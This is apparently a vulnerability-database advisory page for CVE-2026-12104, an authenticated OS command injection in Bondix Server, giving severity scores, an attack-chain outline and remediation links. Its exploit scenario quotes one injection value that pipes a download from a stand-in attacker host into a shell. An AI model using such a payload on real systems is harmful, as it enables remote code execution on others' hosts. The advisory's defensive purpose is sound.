Skip to main content

Bondix Server EUVDEUVD-2026-38031

| CVE-2026-12104 HIGH
OS Command Injection (CWE-78)
2026-06-19 NCSC.ch GHSA-9jwh-589c-mpc6
8.6
CVSS 4.0 · Vendor: NCSC.ch
Share

Severity by source

Vendor (NCSC.ch) PRIMARY
8.6 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:X/RE:L/U:Amber
vuln.today AI
7.2 HIGH

Network-reachable management interface (AV:N) with no special conditions (AC:L) but requires high-privilege configuration-write access (PR:H); no user interaction, and shell execution yields full host CIA impact.

3.1 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (NCSC.ch).

CVSS VectorVendor: NCSC.ch

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:X/RE:L/U:Amber
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
X

Lifecycle Timeline

2
Analysis Generated
Jun 19, 2026 - 14:20 vuln.today
CVE Published
Jun 19, 2026 - 13:41 cve.org
HIGH 8.6

DescriptionCVE.org

OS command injection in the environment and tunnel configuration functionality in SIMA GmbH Bondix through version 1.25.7.5 on Linux allows an authenticated attacker with configuration write access to execute arbitrary operating-system commands via crafted configuration values passed to server-side scripts.

AnalysisAI

Authenticated OS command injection in SIMA GmbH Bondix Server through 1.25.7.5 on Linux allows an attacker with configuration write privileges to execute arbitrary operating-system commands by supplying crafted values in the environment and tunnel configuration that are passed unsanitized to server-side scripts. The flaw was reported by NCSC.ch and carries a CVSS 4.0 base score of 8.6 (High); no public exploit identified at time of analysis, and the vulnerability is not listed in CISA KEV.

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Reach Bondix admin interface
Delivery
Authenticate with config-write account
Exploit
Inject shell metacharacters into environment/tunnel value
Execution
Server-side script invokes shell
Persist
Arbitrary command executes on Linux host
Impact
Pivot or persist on management server

Vulnerability AssessmentAI

Exploitation Exploitation requires (1) network reachability to the Bondix Server management interface, (2) authenticated access with configuration-write permission for the environment and/or tunnel configuration sections, and (3) a vulnerable installation at or below version 1.25.7.5 on Linux. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H) accurately reflects a high-privilege but network-reachable flaw: full CIA impact on the host but gated by PR:H, meaning the attacker must already hold configuration-write authority. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who has obtained Bondix Server administrator credentials - for example through phishing, credential reuse, or insider access - logs into the management interface and edits an environment or tunnel configuration field, embedding shell metacharacters such as '; curl http://attacker/x | sh'. When the server-side script consumes that value, the injected command runs in the Bondix process context, giving the attacker arbitrary code execution on the underlying Linux host; no public exploit identified at time of analysis.
Remediation Upgrade Bondix Server to the fixed release identified in the vendor advisory at https://wiki.bondix.dev/wiki/Security_Advisories#CVE-2026-12104_%E2%80%94_Authenticated_OS_Command_Injection_in_Bondix and cross-referenced in the release notes at https://wiki.bondix.dev/wiki/Downloads#Release_Notes (exact patched version not enumerated in the provided intelligence - confirm with the vendor changelog before deployment). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Inventory all Bondix Server installations including version numbers and identify personnel with configuration write access. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-38031 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy